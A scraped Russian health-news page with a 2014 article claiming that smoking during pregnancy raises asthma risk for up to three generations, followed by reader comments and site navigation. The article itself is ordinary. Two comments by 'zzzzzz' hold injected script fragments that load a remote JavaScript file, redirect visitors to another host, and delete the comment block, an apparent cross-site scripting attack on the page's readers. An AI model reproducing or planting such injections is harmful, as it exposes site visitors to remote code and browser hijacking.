Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Курите? Даже у ваших прав...  >>  Курите? Даже у ваших правнуков будет астма!
 
Обратная связь
 

Курите? Даже у ваших правнуков будет астма!

Размер шрифта
16 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Калифорнийского университета в Лос-Анджелесе обнаружили, что курение во время беременности повышает риск развития бронхиальной астмы на поколения вперед.

Курите? Даже у ваших правнуков будет астма!

Более трехсот миллионов людей по всему миру болеют бронхиальной астмой – воспалительным заболеванием дыхательных путей, которое сопровождается приступами одышки и удушья в ответ на воздействие ряда внешних стимулов (аллергены, холодный воздух, физическая нагрузка и так далее).

Ученые и раньше высказывали идеи о факторе наследственности в развитии этой болезни. Теперь же появились сведения, указывающие на то, что своим безответственным поведением мы можем буквально своими руками взрастить астму у своих потомков аж до третьего поколения!

Речь идет о материнском курении во время беременности, которое может привести к развитию астмы у правнуков легкомысленной барышни. Это пример так называемой трансгенерационной связи: воздействие никотина имело место в первом поколении, а эффект прослеживается вплоть до третьего.

В предыдущиз исследованиях было показано, что воздействие никотина является одним из важнейших факторов риска развития астмы, но ученые не подозревали что этот пагубный эффект отличается столь монолитной устойчивостью.

«Да, существует множество внешних обстоятельств, предрасполагающих к развитию бронхиальной астмы, но мы доказали, что в ваших силах ликвидировать хотя бы одно из них. В противном случае даже ваши правнуки будут в группе риска», – рассказывает доктор Вайрендер Рэан, один из авторов исследовательской группы. «Отказ от курения во время беременности приведет к значительному снижению риска развитию детской астмы на три поколения вперед».

Количество постоянно курящих женщин во всем мире составляет примерно 250 миллионов. Число же людей, страдающих бронхиальной астмой, по оценкам экспертов достигнет четырехсот миллионов к 2025 году. В США двенадцать процентов женщин не рассматривают беременность как повод для того, чтобы бросить курить, что приводит к рождению почти полумиллиона детишек, подвергшихся воздействию никотина в утробе. И это только лишь в США – статистика по миру неизвестна, но ясно наверняка, что цифры там – ошеломительные.

Вывод из всего этого можно сделать лишь один, и он настолько банален, что нам даже неловко его озвучивать: ну, бросьте вы курить, наконец! Не губите себя, своих детей и даже внуков и правнуков!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:51

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Беременность. Когда бежать к врачу   Беременность: как обезопасить себя и будущего малыша от вирусов   Худшая еда для беременной   Курение во время беременности сделает вашего ребенка шизофреником  
03 октября 2013Результаты благотворительного марафона «Всем миром» 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Можно ли подгадать с беременностью?
Можно ли защитить ребенка от микробов

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.